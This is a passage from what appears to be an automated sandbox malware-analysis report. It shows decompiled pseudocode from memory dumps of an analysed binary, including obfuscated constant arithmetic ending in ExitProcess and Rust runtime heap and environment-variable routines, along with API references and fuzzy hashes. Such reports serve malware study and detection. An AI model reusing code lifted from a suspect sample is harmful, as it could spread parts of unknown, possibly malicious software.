				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E0098E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x0097f3fd
0x0097f403
0x0097f407
0x0097f40e
0x0097f415
0x0097f422
0x0097f423
0x0097f429
0x0097f42c
0x0097f433
0x0097f43a
0x0097f441
0x0097f448
0x0097f44f
0x0097f456
0x0097f45d
0x0097f464
0x0097f46b
0x0097f479
0x0097f47c
0x0097f495
0x0097f49f

APIs

ExitProcess.KERNEL32(00000000), ref: 0097F49F

Memory Dump Source

Source File: 00000002.00000002.576404694.0000000000970000.00000040.00000010.sdmp, Offset: 00970000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: d3fcb922b918fc1facb3a171d0d31bf5e0bbe33cbaadeeec7c934bb432bdcfb0
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: 3A1106B1E1021DEBDF04DFE4C94A6EEBBB4FB14315F108188E521AA240E7B45B548F80

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA2C26, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,6EAA283F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6EA9CB0C,?,?,6EA9C074), ref: 6EAA2C67

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a57031769bd76f47a1367ac68fbb031b66d8b7052abc892a30f96a5abdaa12ad
Instruction ID: 8c18cc4849c45387c532c47a9c29a5a9a6286288286a4adfb940e4935b0c1dda
Opcode Fuzzy Hash: a57031769bd76f47a1367ac68fbb031b66d8b7052abc892a30f96a5abdaa12ad
Instruction Fuzzy Hash: 6BF02432244B266AEB510EFF8904B9B7F999F41660B148412FA14BB184CB30D8E182BC

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA22E9, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA9CB0C,?,?,6EA9C074,00000400,FFFDC801,?,?,00000001), ref: 6EAA231B

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 039ac90fa84d6629da7ce0f4630832b441c6dba54f86ac9d46f75c01a35139a3
Instruction ID: 88d7005310526a67a18d2d4631de7c06678110e274ee7b7c5f9c42a7ef746df2
Opcode Fuzzy Hash: 039ac90fa84d6629da7ce0f4630832b441c6dba54f86ac9d46f75c01a35139a3
Instruction Fuzzy Hash: 5DE0E531101322ABEA521EEF8C007AB768DAF132A1F154121EF60AB180DB10CCE182BC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EA8D380, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6EA8D380(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6EA939D0;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6eade128; // 0x2d40000
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6EAA9A30( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6eacface;
							if(_t264 != 0x6eacface) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6eacface;
									if(_t229 == 0x6eacface) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6eacface;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6eacface;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6eacface;
											if(_t264 == 0x6eacface) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6eacface;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6eacface;
												if(_t273 == 0x6eacface) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6eacface;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6EAA9A30( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6EA9E9D0(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6eacf8cc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6EAA9A30( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6EA90D10(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6eade128, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6eade128, 0, _t167);
													}
													HeapFree( *0x6eade128, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6eade128, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ead06d8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6eade128, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6eade128, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6eade128, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6EAA92F0(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6EAA9470(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ead06e0);
						asm("ud2");
						__eflags =  &_a8;
						E6EA848D0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6EA8D270(_t263);
					} else {
						 *0x6eade128 = _t142;
						goto L3;
					}
				}
				L96:
			}

0x6ea8d380
0x6ea8d380
0x6ea8d380
0x6ea8d383
0x6ea8d384
0x6ea8d385
0x6ea8d386
0x6ea8d38c
0x6ea8d38f
0x6ea8d396
0x6ea8d39d
0x6ea8d3aa
0x6ea8d3ad
0x6ea8d3b3
0x6ea8d3ba
0x6ea8d3ce
0x6ea8d3d3
0x6ea8d3da
0x00000000
0x6ea8d3e0
0x6ea8d3e0
0x6ea8d3e6
0x6ea8d3eb
0x6ea8d3ed
0x6ea8d3f2
0x6ea8d3f8
0x6ea8d402
0x6ea8d40c
0x6ea8d43d
0x6ea8d440
0x6ea8d443
0x00000000
0x00000000
0x6ea8d445
0x6ea8d44c
0x6ea8d454
0x6ea8d42f
0x6ea8d42f
0x6ea8d432
0x6ea8d436
0x6ea8d437
0x00000000
0x6ea8d456
0x6ea8d48a
0x6ea8d494
0x6ea8d497
0x6ea8d49e
0x6ea8d4a9
0x6ea8d4b2
0x6ea8d4ba
0x6ea8d4bd
0x6ea8d4c1
0x6ea8d4c6
0x6ea8d420
0x6ea8d426
0x6ea8d429
0x6ea8d42c
0x00000000
0x6ea8d42c
0x6ea8d460
0x6ea8d466
0x6ea8d468
0x6ea8d46e
0x6ea8d471
0x6ea8d474
0x6ea8d477
0x6ea8d479
0x6ea8d4d1
0x6ea8d4da
0x6ea8d4dc
0x6ea8d503
0x6ea8d50b
0x6ea8d50e
0x6ea8d513
0x6ea8d516
0x00000000
0x6ea8d518
0x6ea8d518
0x6ea8d51c
0x6ea8d522
0x6ea8d524
0x6ea8d52a
0x00000000
0x6ea8d530
0x00000000
0x6ea8d530
0x6ea8d52a
0x6ea8d4de
0x6ea8d4de
0x6ea8d4e2
0x6ea8d4e5
0x6ea8d4e8
0x6ea8d4eb
0x6ea8d53b
0x6ea8d53d
0x6ea8d543
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d4ed
0x6ea8d4f3
0x6ea8d4f5
0x6ea8d565
0x6ea8d565
0x6ea8d567
0x6ea8d4f7
0x6ea8d4fb
0x6ea8d4fe
0x6ea8d4fe
0x6ea8d56a
0x6ea8d56d
0x6ea8d56f
0x6ea8d572
0x6ea8d595
0x6ea8d597
0x6ea8d59a
0x6ea8d5a0
0x00000000
0x6ea8d5a2
0x00000000
0x6ea8d5a2
0x6ea8d574
0x6ea8d574
0x6ea8d57d
0x6ea8d57f
0x6ea8d5aa
0x6ea8d5aa
0x6ea8d5ac
0x6ea8d581
0x6ea8d587
0x6ea8d58a
0x6ea8d58a
0x6ea8d5bf
0x6ea8d5c1
0x6ea8d5c4
0x6ea8d5ca
0x6ea8d549
0x6ea8d549
0x6ea8d54c
0x6ea8d54e
0x6ea8d554
0x00000000
0x6ea8d55a
0x00000000
0x6ea8d55a
0x6ea8d5d0
0x6ea8d5d0
0x6ea8d5d0
0x6ea8d5d6
0x6ea8d5f0
0x6ea8d5f3
0x6ea8d5f6
0x6ea8d5f8
0x6ea8d5fb
0x6ea8d601
0x00000000
0x6ea8d607
0x00000000
0x6ea8d607
0x6ea8d601
0x6ea8d5ca
0x6ea8d572
0x6ea8d4eb
0x6ea8d47b
0x6ea8d47b
0x6ea8d47d
0x6ea8d480
0x6ea8d482
0x6ea8d488
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d488
0x00000000
0x6ea8d479
0x6ea8d60c
0x6ea8d612
0x6ea8d61a
0x6ea8d61d
0x6ea8d622
0x6ea8d625
0x6ea8d627
0x6ea8d62a
0x6ea8d62c
0x6ea8d674
0x6ea8d674
0x6ea8d676
0x6ea8d680
0x6ea8d680
0x6ea8d682
0x00000000
0x00000000
0x6ea8d688
0x6ea8d68b
0x6ea8d68f
0x6ea8d692
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d692
0x6ea8d720
0x6ea8d723
0x6ea8d725
0x6ea8d731
0x6ea8d736
0x6ea8d739
0x6ea8d73c
0x6ea8d73c
0x6ea8d73f
0x6ea8d745
0x6ea8d74a
0x6ea8d74f
0x6ea8d752
0x6ea8d754
0x6ea8d757
0x00000000
0x6ea8d75d
0x6ea8d760
0x6ea8d771
0x6ea8d776
0x6ea8d779
0x6ea8d77e
0x6ea8d783
0x6ea8d785
0x6ea8d788
0x6ea8d78f
0x6ea8d792
0x6ea8d799
0x6ea8d79f
0x6ea8d7c2
0x6ea8d7c7
0x6ea8d7cb
0x6ea8d7cd
0x6ea8d7cf
0x6ea8d7d2
0x6ea8d7df
0x6ea8d7e4
0x6ea8d7ea
0x6ea8d7ed
0x6ea8d7ed
0x6ea8d7f0
0x6ea8d7f3
0x6ea8d7f5
0x6ea8d7f8
0x6ea8d7a1
0x6ea8d800
0x6ea8d800
0x6ea8d806
0x6ea8d806
0x6ea8d80d
0x6ea8d80d
0x6ea8d812
0x6ea8d81d
0x6ea8d823
0x6ea8d825
0x6ea8d827
0x6ea8d833
0x6ea8d833
0x6ea8d835
0x6ea8d7b0
0x6ea8d7b0
0x6ea8d7b2
0x6ea8d7b4
0x6ea8d876
0x6ea8d879
0x6ea8d880
0x6ea8d882
0x00000000
0x6ea8d888
0x6ea8d88e
0x6ea8d88f
0x6ea8d894
0x6ea8d897
0x6ea8d89a
0x6ea8d89d
0x6ea8d8a0
0x6ea8d8a2
0x6ea8d8a5
0x6ea8d8a7
0x00000000
0x00000000
0x6ea8d8a9
0x00000000
0x6ea8d8a7
0x6ea8d7ba
0x6ea8d7ba
0x6ea8d7c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d7c0
0x6ea8d83b
0x6ea8d83b
0x6ea8d841
0x6ea8d844
0x00000000
0x6ea8d84a
0x6ea8d84a
0x6ea8d84c
0x6ea8d852
0x00000000
0x6ea8d854
0x00000000
0x6ea8d854
0x00000000
0x6ea8d852
0x6ea8d844
0x6ea8d829
0x6ea8d829
0x6ea8d82f
0x6ea8d831
0x6ea8d8ab
0x6ea8d8ad
0x6ea8d8b3
0x6ea8d8b5
0x6ea8d8b7
0x6ea8d8ba
0x6ea8d8bc
0x6ea8d8be
0x6ea8d8be
0x6ea8d8c2
0x6ea8d8c4
0x6ea8d8c9
0x6ea8d8d6
0x6ea8d8d9
0x6ea8d8de
0x6ea8d8de
0x6ea8d8c9
0x6ea8d8c2
0x6ea8d8e1
0x6ea8d8e1
0x6ea8d8e3
0x6ea8d93d
0x6ea8d940
0x6ea8d942
0x6ea8d945
0x6ea8d8e5
0x6ea8d8e8
0x6ea8d8eb
0x6ea8d8f1
0x6ea8d8f8
0x6ea8d900
0x6ea8d903
0x6ea8d905
0x6ea8d908
0x6ea8d90b
0x6ea8d90e
0x6ea8d912
0x6ea8d914
0x6ea8d916
0x6ea8d91a
0x6ea8d91c
0x6ea8d91c
0x6ea8d928
0x6ea8d928
0x6ea8d936
0x6ea8d936
0x6ea8d8f1
0x6ea8d948
0x6ea8d94f
0x6ea8d960
0x6ea8d960
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d831
0x6ea8d827
0x6ea8d62e
0x6ea8d62e
0x6ea8d630
0x6ea8d632
0x6ea8d632
0x6ea8d636
0x00000000
0x00000000
0x6ea8d638
0x6ea8d63d
0x00000000
0x6ea8d63f
0x6ea8d63f
0x6ea8d644
0x00000000
0x6ea8d646
0x6ea8d646
0x6ea8d64b
0x00000000
0x6ea8d64d
0x6ea8d64d
0x6ea8d652
0x00000000
0x6ea8d654
0x6ea8d654
0x6ea8d659
0x00000000
0x6ea8d65b
0x6ea8d65b
0x6ea8d660
0x00000000
0x6ea8d662
0x6ea8d662
0x6ea8d667
0x00000000
0x6ea8d669
0x6ea8d669
0x6ea8d66c
0x6ea8d66f
0x6ea8d672
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d672
0x6ea8d667
0x6ea8d660
0x6ea8d659
0x6ea8d652
0x6ea8d64b
0x6ea8d644
0x00000000
0x6ea8d63d
0x6ea8d694
0x6ea8d694
0x6ea8d697
0x6ea8d69e
0x6ea8d6a5
0x6ea8d6a7
0x6ea8d6a9
0x6ea8d6ab
0x6ea8d6ad
0x6ea8d6b3
0x6ea8d6be
0x6ea8d6be
0x6ea8d6b3
0x6ea8d6ab
0x6ea8d6c3
0x6ea8d6c7
0x6ea8d6cd
0x6ea8d6d2
0x6ea8d6d5
0x6ea8d6d8
0x6ea8d6e0
0x6ea8d6e2
0x6ea8d6e5
0x6ea8d6e8
0x6ea8d6eb
0x6ea8d6ef
0x6ea8d6f1
0x6ea8d6f3
0x6ea8d6f7
0x6ea8d6f9
0x6ea8d6f9
0x6ea8d705
0x6ea8d70a
0x6ea8d70a
0x6ea8d716
0x6ea8d716
0x6ea8d859
0x6ea8d85c
0x6ea8d862
0x6ea8d862
0x6ea8d865
0x6ea8d875
0x6ea8d875
0x00000000
0x6ea8d62c
0x6ea8d43d
0x6ea8d3bc
0x6ea8d3bc
0x6ea8d3c3
0x6ea8d96a
0x6ea8d96f
0x6ea8d974
0x6ea8d979
0x6ea8d97b
0x6ea8d982
0x6ea8d98a
0x6ea8d994
0x6ea8d99f
0x6ea8d9af
0x6ea8d3c9
0x6ea8d3c9
0x00000000
0x6ea8d3c9
0x6ea8d3c3
0x00000000

APIs

GetProcessHeap.KERNEL32 ref: 6EA8D3BC
HeapAlloc.KERNEL32(02D40000,00000000,0000000A), ref: 6EA8D3D3

Strings

RUST_BACKTRACE, xrefs: 6EA8D48A, 6EA8D4C0

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID: RUST_BACKTRACE
API String ID: 1617791916-3454309823
Opcode ID: 05ce507f397b88ed4c69610d6774ddd4193a63b17c8c6a886a721b5b72d3bfe0
Instruction ID: 1d3f78bb542d0406b4aa9290bcf09eacd1be6505e45f48e7f5d8782e0760d52f
Opcode Fuzzy Hash: 05ce507f397b88ed4c69610d6774ddd4193a63b17c8c6a886a721b5b72d3bfe0
Instruction Fuzzy Hash: 0E02BE71E102198BDB14CF98C8947DEBBF9BF49314F28816AE419BB280D7756C81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 6EA875F4, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E6EA875F4(signed int __ecx, void* __eflags) {
				intOrPtr _t127;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t133;
				void* _t134;
				intOrPtr* _t136;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr* _t150;
				intOrPtr* _t153;
				intOrPtr* _t154;
				signed int* _t155;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				signed int _t167;
				signed int _t170;
				signed int _t171;
				void* _t173;
				void* _t175;
				signed int _t176;
				signed int _t180;
				signed int _t181;
				signed int _t183;
				signed int _t184;
				signed int _t196;
				void* _t198;
				void* _t200;
				signed char _t201;
				signed int* _t203;
				signed char _t204;
				signed int _t207;
				signed char _t208;
				intOrPtr _t212;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				char* _t220;
				char* _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t238;
				signed int _t239;
				signed int _t241;
				signed int _t245;
				intOrPtr _t250;
